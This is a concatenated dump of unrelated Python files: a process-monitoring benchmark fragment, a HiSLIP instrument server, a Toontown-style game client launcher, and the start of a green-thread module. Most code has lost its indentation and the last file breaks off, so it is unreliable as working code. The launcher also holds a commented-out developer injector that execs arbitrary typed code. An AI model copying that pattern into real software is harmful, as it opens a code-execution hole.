args = "-c C:\\OrquestadorTT\\NORTE\\Algoritmos\\dataanalytics.predictive\\configuration.yaml"
parametros = [args]
line_comand = programa + " " + args
t2 = threading.Thread(target=os.system, args=(line_comand,))
t1.start()  # start Select_15_min
# os.system(line_comand)  # call the prediction program directly (disabled)
t2.start()  # launch the prediction program
time.sleep(3)
date1_out = date_last_modify(resultados)
date1_in = date_last_modify(input)
date2_out = date1_out
date2_in = date1_in
i = 1
print ("ANNNTES DE ABRIR")
with open(log,"a",newline='') as f:
print("DESPUES DE ABRIR")
while (i<=iters):
print("Iteración número:", i)
print("Ultima modificacion del input:", time.strftime('%m/%d/%Y_%H:%M:%S', time.gmtime(date1_in)))
print("Ultima modificacion del output:", time.strftime('%m/%d/%Y_%H:%M:%S', time.gmtime(date1_out)))
        init = time.perf_counter()  # time.clock() was removed in Python 3.8
date = time.strftime("%d:%m:%y_%H:%M:%S")
RAM, memory, CPU = memory_usage_psutil()
        while date1_out == date2_out:  # wait until a new prediction appears
            time.sleep(1)
            date2_out = date_last_modify(resultados)
        print("New output modification:", time.strftime('%m/%d/%Y_%H:%M:%S', time.gmtime(date2_out)))
        end = time.perf_counter()
time_elapsed = (end - init)
line = {'ALGORITHM':str(algorithm), 'RAM':str(RAM), 'CPU':str(CPU), 'ITER':(str(i)+"/"+str(iters)), 'TIME':str(time_elapsed), 'DATE':str(date)}
# line_ = {'ALGORITHM':"Min22",'RAM':"32",'CPU':"33",'ITERS':"1",'TIME':"324",'DATE':str(date)}
fieldnames = ['ALGORITHM', 'RAM', 'CPU', 'ITER', 'TIME', 'DATE']
writer = csv.DictWriter(f, fieldnames=fieldnames)
writer.writerow(line)
        while (date1_in == date2_in) and (i < iters):  # wait for a new input
            time.sleep(1)
            date2_in = date_last_modify(input)
        print("New input modification:", time.strftime('%m/%d/%Y_%H:%M:%S', time.gmtime(date2_in)))
date1_out = date2_out
date1_in = date2_in
i = i+1
f.close()  # redundant: the with-block above already closed the file
t1.join()
t2.join()
|
hislip_server.py
|
# -*- coding: utf-8 -*-
"""
@author: Lukas Sandström
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import struct
import threading
try:
    from cStringIO import StringIO  # Python 2
except ImportError:
    from io import BytesIO as StringIO  # Python 3: the buffers hold bytes
from pprint import pprint
import socket
try:
import SocketServer as socketserver
except ImportError:
import socketserver
from collections import namedtuple
from aenum import IntEnum
logger = logging.getLogger(__name__)
class HislipError(Exception):
pass
class HislipProtocolError(HislipError):
"""Something went wrong on the wire"""
pass
class HislipConnectionClosed(HislipError):
pass
def repack(from_, to, *args):
"""
Repacks data from one unpacked state to another.
`struct.unpack(to, struct.pack(from_, *args))`
:param from_: The struct which the *args will be packed into
:param to: The target struct
:param args: positional arguments
:return: a tuple
"""
return struct.unpack(to, struct.pack(from_, *args))
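# Example: repack("!H2s", "!I", 1, b"RS") packs a short plus two bytes
# (4 bytes total) and re-reads them as a single unsigned 32-bit integer.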
class Message(object):
_type_check = None # Used to check for the correct type in unpack when subclassing
_subclasses = dict() # Holds a reference for all defined subclasses msg_id => class
@classmethod
def message(cls, type_):
"""
Decorator for subclasses
"""
def x(subclass):
subclass._type_check = type_
cls._subclasses[type_] = subclass
return subclass
return x
class Type(IntEnum):
Initialize = 0
InitializeResponse = 1
FatalError = 2
Error = 3
AsyncLock = 4
AsyncLockResponse = 5
Data = 6
DataEnd = 7
DeviceClearComplete = 8
DeviceClearAcknowledge = 9
AsyncRemoteLocalControl = 10
AsyncRemoteLocalResponse = 11
Trigger = 12
Interrupted = 13
AsyncInterrupted = 14
AsyncMaximumMessageSize = 15
AsyncMaximumMessageSizeResponse = 16
AsyncInitialize = 17
AsyncInitializeResponse = 18
AsyncDeviceClear = 19
AsyncServiceRequest = 20
AsyncStatusQuery = 21
AsyncStatusResponse = 22
AsyncDeviceClearAcknowledge = 23
AsyncLockInfo = 24
AsyncLockInfoResponse = 25
prologue = b"HS"
def __init__(self):
self.type = self._type_check
self.ctrl_code = 0
self.param = 0
self.payload = b""
@classmethod
def _copy(cls, msg):
new = cls()
new.type = msg.type
new.ctrl_code = msg.ctrl_code
new.param = msg.param
new.payload = msg.payload
return new
def __str__(self):
return "%s <%r> <%r> <%r> <%i> : <%r>" % \
(self.prologue, self.type, self.ctrl_code, self.param, self.payload_len, self.payload[:50])
@classmethod
def parse(cls, fd):
"""
A Message factory function, which reads a complete message from fd and returns an instance
of the correct subclass, or Message() if there is no subclass available.
:param fd: object implementing read()
:return: A Message instance
"""
tmp = cls()
tmp.unpack(fd)
if tmp.type not in cls._subclasses:
return tmp
return cls._subclasses[tmp.type]._copy(tmp)
@property
def payload_len(self):
return len(self.payload)
_struct_hdr = struct.Struct("!2sBBIQ")
_msg_tuple = namedtuple("HiSLIP_message", ["prologue", "type", "ctrl_code", "param", "payload_len"])
def pack(self):
assert self.type is not None
try:
hdr = self._struct_hdr.pack(self.prologue, self.type, self.ctrl_code, self.param, self.payload_len)
except Exception as e:
logger.exception("struct.pack() failed.")
raise
return hdr + self.payload
def unpack(self, fd):
try:
data = fd.read(self._struct_hdr.size)
except socket.error as e:
raise HislipConnectionClosed(e.message)
if not len(data):
raise HislipConnectionClosed("Short read. Connection closed.")
msg = self._msg_tuple._make(self._struct_hdr.unpack_from(data))
if msg.prologue != self.prologue:
raise HislipProtocolError("Invalid message prologue")
try:
self.type = self.Type(msg.type)
except ValueError:
raise HislipProtocolError("Unknown message type (%i)" % msg.type)
if self._type_check and self._type_check != self.type:
raise HislipError("Unexpected message type (%i)" % self.type)
self.ctrl_code = msg.ctrl_code
self.param = msg.param
self.payload = fd.read(msg.payload_len)
if msg.payload_len != len(self.payload):
raise HislipProtocolError("Invalid payload length, %i (header) != %i (actual)" %
(msg.payload_len, len(self.payload)))
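    # Wire format handled by pack()/unpack() ("!2sBBIQ", 16-byte header,
    # network byte order):
    #   2s  prologue, always b"HS"
    #   B   message type
    #   B   control code
    #   I   message parameter
    #   Q   payload length, followed by that many payload bytes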
@Message.message(Message.Type.Initialize)
class MessageInitialize(Message):
client_protocol_version = 0
client_vendor_id = "ZZ"
@property
def sub_address(self):
return str(self.payload)
@sub_address.setter
def sub_address(self, x):
self.payload = str(x)
@property
def param(self):
return repack("!H2s", "!I", self.client_protocol_version, self.client_vendor_id)[0]
@param.setter
def param(self, x):
self.client_protocol_version, self.client_vendor_id = repack("!I", "!H2s", x)
@Message.message(Message.Type.InitializeResponse)
class MessageInitializeResponse(Message):
server_protocol_version = struct.pack("!BB", 1, 0)
session_id = None
@property
def overlap_mode(self):
return self.ctrl_code & 1
@overlap_mode.setter
def overlap_mode(self, x):
if x:
self.ctrl_code = 1
else:
self.ctrl_code = 0
@property
def param(self):
return repack("!HH", "!I", self.server_protocol_version, self.session_id)[0]
@param.setter
def param(self, x):
self.server_protocol_version, self.session_id = repack("!I", "!HH", x)
@Message.message(Message.Type.AsyncInitialize)
class MessageAsyncInitialize(Message):
@property
def session_id(self):
return self.param
@session_id.setter
def session_id(self, x):
self.param = int(x)
@Message.message(Message.Type.AsyncInitializeResponse)
class MessageAsyncInitializeResponse(Message):
@property
def server_vendor_id(self):
return repack("!I", "!xx2s", self.param)[0]
@server_vendor_id.setter
def server_vendor_id(self, x):
assert len(str(x)) == 2
self.param = repack("!xx2s", "!I", str(x))[0]
@Message.message(Message.Type.AsyncMaximumMessageSize)
class MessageAsyncMaximumMessageSize(Message):
@property
def max_size(self):
assert self.payload_len == 8
return struct.unpack("!Q", self.payload)
@max_size.setter
def max_size(self, x):
self.payload = struct.pack("!Q", x)
@Message.message(Message.Type.AsyncMaximumMessageSizeResponse)
class MessageAsyncMaximumMessageSizeResponse(MessageAsyncMaximumMessageSize):
pass
@Message.message(Message.Type.AsyncLock)
class MessageAsyncLock(Message):
@property
def request(self):
return self.ctrl_code & 1
@property
def release(self):
return not self.ctrl_code & 1
@property
def timeout(self):
assert self.request # The timeout parameter is only sent when requesting the lock
return self.param
@Message.message(Message.Type.AsyncLockResponse)
class MessageAsyncLockResponse(Message):
pass
@Message.message(Message.Type.AsyncLockInfoResponse)
class MessageAsyncLockInfoResponse(Message):
@property
def exclusive_lock_granted(self):
return self.ctrl_code & 1
@exclusive_lock_granted.setter
def exclusive_lock_granted(self, x):
if x:
self.ctrl_code = 1
else:
self.ctrl_code = 0
@property
def lock_count(self):
return self.param
@lock_count.setter
def lock_count(self, x):
self.param = int(x)
@Message.message(Message.Type.Data)
class MessageData(Message):
@property
def RMT(self):
return self.ctrl_code & 1
@RMT.setter
def RMT(self, x):
if x:
self.ctrl_code = 1
else:
self.ctrl_code = 0
@property
def message_id(self):
return self.param
@message_id.setter
def message_id(self, x):
self.param = int(x)
@Message.message(Message.Type.AsyncStatusQuery)
class MessageAsyncStatusQuery(MessageData):
pass
@Message.message(Message.Type.AsyncStatusResponse)
class MessageAsyncStatusResponse(MessageData):
@property
def status(self):
return self.ctrl_code
@status.setter
def status(self, x):
self.ctrl_code = x
@Message.message(Message.Type.DataEnd)
class MessageDataEnd(MessageData):
pass
@Message.message(Message.Type.AsyncDeviceClearAcknowledge)
class MessageAsyncDeviceClearAcknowledge(Message):
@property
def overlap_mode(self):
return self.ctrl_code & 1
@overlap_mode.setter
def overlap_mode(self, x):
if x:
self.ctrl_code = 1
else:
self.ctrl_code = 0
@Message.message(Message.Type.DeviceClearComplete)
class MessageDeviceClearComplete(MessageAsyncDeviceClearAcknowledge):
pass
@Message.message(Message.Type.DeviceClearAcknowledge)
class MessageDeviceClearAcknowledge(MessageAsyncDeviceClearAcknowledge):
pass
@Message.message(Message.Type.Trigger)
class MessageTrigger(MessageData):
pass
class HislipClient(object):
def __init__(self):
self.instr_sub_addr = None
self.overlap_mode = None
self.session_id = None
#private
self.lock = threading.RLock()
self.sync_handler = None
self.async_handler = None
self.max_message_size = None
self.sync_buffer = StringIO()
self.message_id = 0xffffff00
self.MAV = False # Message available for client. See HiSLIP 4.14.1
self.RMT_expected = False
def get_stb(self):
if self.MAV:
return 0x10
return 0x00
class HislipHandler(socketserver.StreamRequestHandler, object):
class _MsgHandler(dict):
def __call__(self, msg_type): # Decorator for registering handler methods
def x(func):
self[msg_type] = func
return func
return x
msg_handler = _MsgHandler()
    def __init__(self, request, client_address, server):
        """
        :param socket.Socket request:
        :param client_address:
        :param HislipServer server:
        """
        self.client = None
        self.sync_conn = None
        self.session_id = None
        # BaseRequestHandler.__init__ runs the whole request (setup/handle/finish)
        # and sets self.server itself, so it must be called after the attributes
        # above are initialized.
        socketserver.BaseRequestHandler.__init__(self, request, client_address, server)
def send_msg(self, message):
logger.debug(" resp: %s", message)
if message.type == Message.Type.Data or message.type == Message.Type.DataEnd:
with self.client.lock: # HiSLIP 4.14.1
self.client.MAV = True
self.wfile.write(message.pack())
def init_connection(self):
init = Message.parse(self.rfile)
if init.type == Message.Type.Initialize:
self.sync_init(init)
elif init.type == Message.Type.AsyncInitialize:
self.async_init(init)
else:
raise HislipProtocolError("Unexpected message at connection init, %r" % init)
def sync_init(self, msg):
"""
:param MessageInitialize msg:
"""
# Send message to subclass
# check protocol version
with self.server.client_lock:
self.client, session_id = self.server.new_client(), self.server.new_session_id()
with self.client.lock:
self.client.session_id = session_id
self.client.sync_handler = self
self.client.instr_sub_addr = msg.payload
self.sync_conn = True
logger.info("Connection from %r to %s", self.client_address, msg.payload)
error = self.server.connection_request(self.client)
if error is not None:
self.send_msg(error)
self.server.client_disconnect(self.client)
raise error
response = MessageInitializeResponse()
response.overlap_mode = self.server.overlap_mode
        response.session_id = session_id  # the id assigned above; self.session_id is only set on the async channel
self.send_msg(response)
# Setup of sync channel complete, wait for connection of async channel
def async_init(self, msg):
"""
:param MessageAsyncInitialize msg:
"""
self.session_id = msg.session_id
try:
self.client = self.server.get_client(msg.session_id)
except KeyError:
raise HislipProtocolError("AsyncInitialize with unknown session id.")
with self.client.lock:
if self.client.async_handler is not None:
raise HislipProtocolError("AsyncInitialize with already initialized session.")
self.client.async_handler = self
self.sync_conn = False
response = MessageAsyncInitializeResponse()
response.server_vendor_id = self.server.vendor_id
self.send_msg(response)
@msg_handler(Message.Type.AsyncDeviceClear)
def async_device_clear(self, msg): # HiSLIP 4.12
# FIXME: stub
response = MessageAsyncDeviceClearAcknowledge()
response.overlap_mode = self.server.overlap_mode
self.send_msg(response)
@msg_handler(Message.Type.DeviceClearComplete)
def device_clear(self, msg): # HiSLIP 4.12
# FIXME: stub
overlap = msg.overlap_mode
response = MessageDeviceClearAcknowledge()
response.overlap_mode = self.server.overlap_mode
self.send_msg(response)
@msg_handler(Message.Type.AsyncLock)
def async_lock(self, msg):
# FIXME: stub
response = MessageAsyncLockResponse()
response.ctrl_code = 1
self.send_msg(response)
@msg_handler(Message.Type.AsyncLockInfo)
def async_lock_info(self, msg):
# FIXME: locking stub
response = MessageAsyncLockInfoResponse()
response.exclusive_lock_granted = True
response.lock_count = 1
self.send_msg(response)
@msg_handler(Message.Type.AsyncStatusQuery)
def async_status_query(self, msg):
response = MessageAsyncStatusResponse()
with self.client.lock:
if msg.RMT:
self.client.MAV = False
response.status = self.client.get_stb()
self.send_msg(response)
@msg_handler(Message.Type.AsyncMaximumMessageSize)
def max_size_message(self, msg):
"""
:param MessageAsyncMaximumMessageSize msg:
"""
with self.client.lock:
self.client.max_message_size = msg.max_size
response = MessageAsyncMaximumMessageSizeResponse()
response.max_size = int(self.server.max_message_size)
self.send_msg(response)
@msg_handler(Message.Type.Data)
def sync_data(self, msg):
"""
:param MessageData msg:
"""
with self.client.lock:
if msg.RMT:
self.client.MAV = False
self.client.sync_buffer.write(msg.payload)
@msg_handler(Message.Type.DataEnd)
def sync_data_end(self, msg):
with self.client.lock:
if msg.RMT:
self.client.MAV = False
self.client.sync_buffer.write(msg.payload)
self.client.message_id = msg.message_id
self.client.sync_buffer.seek(0)
data = self.client.sync_buffer.read()
logger.debug("DataEnd: %r" % data)
# Crude query detection: a command ending in "?\n" gets a canned reply.
if len(data) > 2 and data[-2] == "?":
response = MessageDataEnd()
response.message_id = self.client.message_id
response.payload = b"RS,123,456,798\n"
self.send_msg(response)
# FIXME: pass data to application
self.client.sync_buffer = StringIO() # Clear the buffer
@msg_handler(Message.Type.Trigger)
def trigger(self, msg):
with self.client.lock:
self.client.message_id = msg.message_id
if msg.RMT:
self.client.MAV = False
def handle(self):
self.init_connection()
if self.sync_conn:
prf = " sync: %s"
else:
prf = "async: %s"
while True:
try:
msg = Message.parse(self.rfile)
except HislipConnectionClosed as e:
logger.info("Connection closed, %r", self.client_address)
self.server.client_disconnect(self.client)
break
logger.debug(prf, str(msg))
if msg.type in self.msg_handler:
self.msg_handler[msg.type](self, msg)
else:
logger.warning("No handler for this message")
class HislipServer(socketserver.ThreadingTCPServer, object):
def __init__(self, *args, **kwargs):
super(HislipServer, self).__init__(*args, **kwargs)
self.vendor_id = b"\x52\x53" # R & S
self.max_message_size = 500e6
self.overlap_mode = False
self.allow_reuse_address = True
self.client_lock = threading.RLock()
self.clients = dict() # session id => Client()
self._last_session_id = 0
def read_stb(self):
# Override this in a subclass
return 0
def new_session_id(self):
self._last_session_id += 1
return self._last_session_id
def new_client(self):
return HislipClient()
def get_client(self, session_id):
"""
:param session_id:
:rtype: HislipClient
"""
with self.client_lock:
return self.clients[session_id]
def connection_request(self, client):
"""
This method can be used to reject incoming connections by returning a MessageFatalError.
:param HislipClient client:
:return: None or MessageFatalError
"""
with self.client_lock:
self.clients[client.session_id] = client
def client_disconnect(self, client):
with self.client_lock:
try:
client = self.clients.pop(client.session_id)
except KeyError:
return
with client.lock:
try:
if client.sync_handler is not None:
client.sync_handler.request.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
try:
if client.async_handler is not None:
client.async_handler.request.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
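def _example_status_server():
    """Minimal usage sketch: a HislipServer subclass that reports a fixed
    status byte via read_stb(); 4880 is the standard HiSLIP port."""
    class StatusServer(HislipServer):
        def read_stb(self):
            return 0x10  # MAV bit set, mirroring HislipClient.get_stb()
    server = StatusServer(("localhost", 4880), HislipHandler)
    worker = threading.Thread(target=server.serve_forever)
    worker.daemon = True
    worker.start()
    return server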
def _main():
import sys
logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)
hislip_server = HislipServer(("localhost", 4880), HislipHandler)
server_thread = threading.Thread(target=hislip_server.serve_forever)
server_thread.daemon = True
server_thread.start()
raw_input("Enter to end")
if __name__ == "__main__":
    import stacktracer
    stacktracer.trace_start("trace.html")
    _main()
|
ClientStart.py
|
#!/usr/bin/env python2
import __builtin__
import os
__builtin__.process = 'client'
# Temporary hack patch:
__builtin__.__dict__.update(__import__('pandac.PandaModules', fromlist = ['*']).__dict__)
from direct.extensions_native import HTTPChannel_extensions
from direct.extensions_native import Mat3_extensions
from direct.extensions_native import VBase3_extensions
from direct.extensions_native import VBase4_extensions
from direct.extensions_native import NodePath_extensions
from panda3d.core import loadPrcFile
# if __debug__:
# loadPrcFile('config/general.prc')
# loadPrcFile('config/release/dev.prc')
# else:
# config = niraidata.CONFIG
# config = aes.decrypt(config, key, iv)
config = """# Window settings:
window-title DubitTown [BETA]
win-origin -2 -2
icon-filename phase_3/etc/icon.ico
cursor-filename phase_3/etc/toonmono.cur
show-frame-rate-meter #f
# DubitTown Engine 3.0
want-vive #f
want-android #f
want-headless #f
want-live-updates #f
want-cuda #t
loader-num-threads 25
# Debug
default-directnotify-level info
notify-level-DistributedNPCScientistAI info
notify-level-DistributedPetAI info
want-pstats #f
# Audio:
audio-library-name p3fmod_audio
# Graphics:
aux-display pandagl
aux-display pandadx9
aux-display p3tinydisplay
# Models:
model-cache-models #f
model-cache-textures #f
default-model-extension .bam
# Performance
smooth-enable-prediction 1
smooth-enable-smoothing 1
smooth-lag 0.4
smooth-max-future 1.0
smooth-min-suggest-resync 0
average-frame-rate-interval 60.0
clock-frame-rate 60.0
# Preferences:
preferences-filename preferences.json
# Backups:
backups-filepath backups/
backups-extension .json
# Server:
server-timezone EST/EDT/-5
server-port 7198
account-bridge-filename astron/databases/account-bridge.db
# Performance:
sync-video #f
texture-power-2 none
gl-check-errors #f
garbage-collect-states #f
# Egg object types:
egg-object-type-barrier <Scalar> collide-mask { 0x01 } <Collide> { Polyset descend }
egg-object-type-trigger <Scalar> collide-mask { 0x01 } <Collide> { Polyset descend intangible }
egg-object-type-sphere <Scalar> collide-mask { 0x01 } <Collide> { Sphere descend }
egg-object-type-trigger-sphere <Scalar> collide-mask { 0x01 } <Collide> { Sphere descend intangible }
egg-object-type-floor <Scalar> collide-mask { 0x02 } <Collide> { Polyset descend }
egg-object-type-dupefloor <Scalar> collide-mask { 0x02 } <Collide> { Polyset keep descend }
egg-object-type-camera-collide <Scalar> collide-mask { 0x04 } <Collide> { Polyset descend }
egg-object-type-camera-collide-sphere <Scalar> collide-mask { 0x04 } <Collide> { Sphere descend }
egg-object-type-camera-barrier <Scalar> collide-mask { 0x05 } <Collide> { Polyset descend }
egg-object-type-camera-barrier-sphere <Scalar> collide-mask { 0x05 } <Collide> { Sphere descend }
egg-object-type-model <Model> { 1 }
egg-object-type-dcs <DCS> { 1 }
# Safe zones:
want-safe-zones #t
want-toontown-central #t
want-donalds-dock #t
want-daisys-garden #t
want-minnies-melodyland #t
want-the-burrrgh #t
want-donalds-dreamland #t
want-goofy-speedway #t
want-outdoor-zone #t
want-golf-zone #t
# Weather system
want-weather #f
# Options Page
change-display-settings #t
change-display-api #t
# Safe zone settings:
want-treasure-planners #t
want-suit-planners #t
want-butterflies #f
# Classic characters:
want-classic-chars #f
want-mickey #f
want-donald-dock #f
want-daisy #f
want-minnie #f
want-pluto #f
want-donald-dreamland #f
want-chip-and-dale #f
want-goofy #f
# Trolley minigames:
want-minigames #t
want-photo-game #f
want-travel-game #f
# Picnic table board games:
want-game-tables #f
# Cog Battles
base-xp-multiplier 5.0
# Cog headquarters:
want-cog-headquarters #t
want-sellbot-headquarters #t
want-cashbot-headquarters #t
want-lawbot-headquarters #t
want-bossbot-headquarters #t
# Cashbot boss:
want-resistance-toonup #f
want-resistance-restock #f
# Cog buildings:
want-cogbuildings #t
# Optional:
show-total-population #f
want-mat-all-tailors #t
want-long-pattern-game #f
show-population #t
show-total-population #t
# Animated Props
zero-pause-mult 1.0
# Interactive Props
randomize-interactive-idles #t
interactive-prop-random-idles #t
interactive-prop-info #f
props-buff-battles #t
prop-idle-pause-time 0.0
# Events
want-charity-screen #t
# Developer options:
want-dev #f
want-pstats #f
want-directtools #f
want-tk #f
# Holidays
active-holidays 64, 65, 66 #128, 116, 63
# Temporary:
want-old-fireworks #t
# Live updates:
want-live-updates #t
# Server:
server-version TTPA-Beta-1.2.0
shard-low-pop 50
shard-mid-pop 80
# Core features:
want-pets #t
want-parties #f
want-cogdominiums #t
want-achievements #t
# Chat:
want-whitelist #t
# Cashbot boss:
want-resistance-toonup #t
want-resistance-restock #t
# Developer options:
want-dev #f
"""
production_model_path = '/'
if(os.environ.get('model-path', production_model_path) == production_model_path):
config += '\nmodel-path ' + production_model_path
else:
config += '\nmodel-path ' + os.environ.get('model-path', production_model_path)
import sys
from panda3d.core import *
import StringIO
io = StringIO.StringIO(config)
vfs = VirtualFileSystem.getGlobalPtr()
import glob
for line in io.readlines():
# check if the current line is a comment...
if line.startswith('#'):
continue
# print line
# load the prc file value
loadPrcFileData('', line)
del config
from direct.directnotify.DirectNotifyGlobal import directNotify
from otp.settings.Settings import Settings
notify = directNotify.newCategory('DubitTownClient')
notify.setInfo(True)
preferencesFilename = ConfigVariableString(
'preferences-filename', 'preferences.json').getValue()
notify.info('Reading %s...' % preferencesFilename)
__builtin__.settings = Settings(preferencesFilename)
from toontown.settings import ToontownSettings
__builtin__.ttsettings = ToontownSettings
for setting in ttsettings.DefaultSettings:
if setting not in settings:
settings[setting] = ttsettings.DefaultSettings[setting]
loadPrcFileData('Settings: res', 'win-size %d %d' % tuple(settings.get('res', (1280, 720))))
loadPrcFileData('Settings: fullscreen', 'fullscreen %s' % settings['fullscreen'])
loadPrcFileData('Settings: music', 'audio-music-active %s' % settings['music'])
loadPrcFileData('Settings: sfx', 'audio-sfx-active %s' % settings['sfx'])
loadPrcFileData('Settings: musicVol', 'audio-master-music-volume %s' % settings['musicVol'])
loadPrcFileData('Settings: sfxVol', 'audio-master-sfx-volume %s' % settings['sfxVol'])
loadPrcFileData('Settings: loadDisplay', 'load-display %s' % settings['loadDisplay'])
loadPrcFileData('Settings: toonChatSounds', 'toon-chat-sounds %s' % settings['toonChatSounds'])
loadPrcFileData('', 'texture-anisotropic-degree %d' % settings['anisotropic-filtering'])
loadPrcFileData('', 'framebuffer-multisample %s' % settings['anti-aliasing'])
loadPrcFileData('', 'sync-video %s' % settings['vertical-sync'])
DefaultPhases = (3, 3.5, 4, 5, 5.5, 6, 7, 8, 9, 10, 11, 12, 13)
notify.info("Loading Default Pack...")
for file in glob.glob('resources/default/*.mf'):
# Derive the phase number from the file name; basename() keeps this
# working with both forward and backward path separators.
if float(os.path.basename(file).replace('phase_', '').replace('.mf', '')) in DefaultPhases:
mf = Multifile()
mf.openReadWrite(Filename(file))
names = mf.getSubfileNames()
vfs.mount(mf, Filename('/'), 0)
notify.info('Successfully Mounted: ' + file)
notify.info("Default Pack Loaded!")
from toontown.toonbase.ContentPackManager import ContentPackManager
__builtin__.ContentPackMgr = ContentPackManager()
ContentPackMgr.loadAll()
loadDisplay = settings.get('loadDisplay', 'pandagl')
loadPrcFileData('', 'load-display %s' % loadDisplay)
import time
import random
try:
from toontown.launcher.TTALauncher import TTALauncher
launcher = TTALauncher()
__builtin__.launcher = launcher
except Exception as e:
raise e
if launcher.isDummy():
http = HTTPClient()
else:
http = launcher.http
from toontown.toonbase import ToontownGlobals
tempLoader = Loader()
from direct.gui import DirectGuiGlobals
from direct.gui.DirectGui import *
from toontown.pgui import DirectGuiGlobals as PGUIGlobals
DirectGuiGlobals.setDefaultFontFunc(ToontownGlobals.getInterfaceFont)
PGUIGlobals.setDefaultFontFunc(ToontownGlobals.getInterfaceFont)
launcher.setPandaErrorCode(7)
notify.info('Loading DubitTownBase...')
from toontown.toonbase import ToonBase
ToonBase.ToonBase()
from panda3d.core import *
if base.win is None:
notify.error('Unable to open window; aborting.')
launcher.setPandaErrorCode(0)
launcher.setPandaWindowOpen()
ConfigVariableDouble('decompressor-step-time').setValue(0.01)
ConfigVariableDouble('extractor-step-time').setValue(0.01)
backgroundNode = tempLoader.loadSync(Filename('phase_3/models/gui/loading-background'))
backgroundNodePath = aspect2d.attachNewNode(backgroundNode, 0)
backgroundNodePath.setPos(0.0, 0.0, 0.0)
backgroundNodePath.setScale(render2d, VBase3(1))
backgroundNodePath.find('**/fg').hide()
logo = OnscreenImage(
image = 'phase_3/maps/toontown-logo.png',
scale = (1 / (4.0 / 3.0), 1, 1 / (4.0 / 3.0)),
pos = backgroundNodePath.find('**/fg').getPos())
logo.setTransparency(TransparencyAttrib.MAlpha)
logo.setBin('fixed', 20)
logo.reparentTo(backgroundNodePath)
backgroundNodePath.find('**/bg').setBin('fixed', 10)
base.graphicsEngine.renderFrame()
DirectGuiGlobals.setDefaultRolloverSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_rollover.ogg'))
DirectGuiGlobals.setDefaultClickSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_create_toon_fwd.ogg'))
DirectGuiGlobals.setDefaultDialogGeom(loader.loadModel('phase_3/models/gui/dialog_box_gui'))
PGUIGlobals.setDefaultRolloverSound(base.loadSfx('phase_3/audio/sfx/GUI_rollover.ogg'))
PGUIGlobals.setDefaultClickSound(base.loadSfx('phase_3/audio/sfx/GUI_create_toon_fwd.ogg'))
PGUIGlobals.setDefaultDialogGeom(loader.loadModel('phase_3/models/gui/dialog_box_gui'))
from toontown.toonbase import TTLocalizer
from otp.otpbase import OTPGlobals
OTPGlobals.setDefaultProductPrefix(TTLocalizer.ProductPrefix)
# For Devs only. (The below)
'''from direct.stdpy import threading, thread
def __inject_wx(_):
code = textbox.GetValue()
exec (code, globals())
def openInjector_wx():
import wx
app = wx.App(redirect = False)
frame = wx.Frame(None, title = "TTPA Dev Injector", size=(640, 400), style=wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX | wx.MINIMIZE_BOX)
panel = wx.Panel(frame)
button = wx.Button(parent = panel, id = -1, label = "Inject", size = (50, 20), pos = (295, 0))
global textbox
textbox = wx.TextCtrl(parent = panel, id = -1, pos = (20, 22), size = (600, 340), style = wx.TE_MULTILINE)
frame.Bind(wx.EVT_BUTTON, __inject_wx, button)
frame.Show()
app.SetTopWindow(frame)
textbox.AppendText(" ")
threading.Thread(target = app.MainLoop).start()
openInjector_wx()'''
if base.musicManagerIsValid:
music = base.loader.loadMusic('phase_3/audio/bgm/tt_theme.ogg')
if music:
music.setLoop(1)
music.setVolume(0.9)
music.play()
notify.info('Loading the default GUI sounds...')
DirectGuiGlobals.setDefaultRolloverSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_rollover.ogg'))
DirectGuiGlobals.setDefaultClickSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_create_toon_fwd.ogg'))
else:
music = None
from toontown.toonbase import ToontownLoader
from direct.gui.DirectGui import *
serverVersion = base.config.GetString('server-version', 'no_version_set')
'''
Let's have these here so you can tell if dev or debug mode is enabled or not
easily.
'''
if __dev__:
serverVersionText = serverVersion + "-dev"
elif __debug__:
serverVersionText = serverVersion + "-debug"
else:
serverVersionText = serverVersion
version = OnscreenText(serverVersionText, pos = (-1.3, -0.975), scale = 0.06, fg = Vec4(0, 0, 0, 1), align = TextNode.ALeft)
version.setPos(0.03, 0.03)
version.reparentTo(base.a2dBottomLeft)
from toontown.suit import Suit
Suit.loadModels()
loader.beginBulkLoad('init', TTLocalizer.LoaderLabel, 138, 0, TTLocalizer.TIP_NONE, 0)
from toontown.toonbase.ToonBaseGlobal import *
from direct.showbase.MessengerGlobal import *
from toontown.distributed import ToontownClientRepository
cr = ToontownClientRepository.ToontownClientRepository(serverVersion, launcher)
cr.music = music
del music
base.initNametagGlobals()
base.cr = cr
loader.endBulkLoad('init')
from otp.friends import FriendManager
from otp.distributed.OtpDoGlobals import *
cr.generateGlobalObject(OTP_DO_ID_FRIEND_MANAGER, 'FriendManager')
if not launcher.isDummy():
base.startShow(cr, launcher.getGameServer())
else:
base.startShow(cr)
backgroundNodePath.reparentTo(hidden)
backgroundNodePath.removeNode()
del backgroundNodePath
del backgroundNode
del tempLoader
version.cleanup()
del version
__builtin__.loader = base.loader
autoRun = ConfigVariableBool('toontown-auto-run', 1)
if autoRun:
try:
base.run()
except SystemExit:
raise
except:
from toontown.toonbase import ToonPythonUtil as PythonUtil
print PythonUtil.describeException()
raise
|
gthread.py
|
import sys
import aio
import inspect
# mark not started but no error
aio.error = None
aio.paused = False
aio.fd = {}
aio.pstab = {}
def _shutdown():
print(__file__, "_shutdown")
# https://docs.python.org/3/library/threading.html#threading.excepthook
# a green thread
# FIXME: fix wapy BUG 882 so target can be None too in preempt mode
# TODO: default granularity with https://docs.python.org/3/library/sys.html#sys.setswitchinterval
class Lock:
    # Cooperative no-op lock: green threads never run concurrently, so a
    # simple counter satisfies the threading.Lock interface.
    count = 0
    def __enter__(self):
        self.acquire()
    def __exit__(self, *tb):
        self.release()
    def acquire(self, blocking=True, timeout=-1):
self.count += 1
return True
def release(self):
self.count -= 1
def locked(self):
return self.count>0
class Condition:
def __init__(self, lock=None):
self.lock = lock or Lock()
def acquire(self, *args):
return self.lock.acquire()
def release(self):
self.lock.release()
def wait(self, timeout=None):
    raise RuntimeError("wait not supported")
def wait_for(self, predicate, timeout=None):
    raise RuntimeError("wait_for not supported")
class Thread:
def __init__(
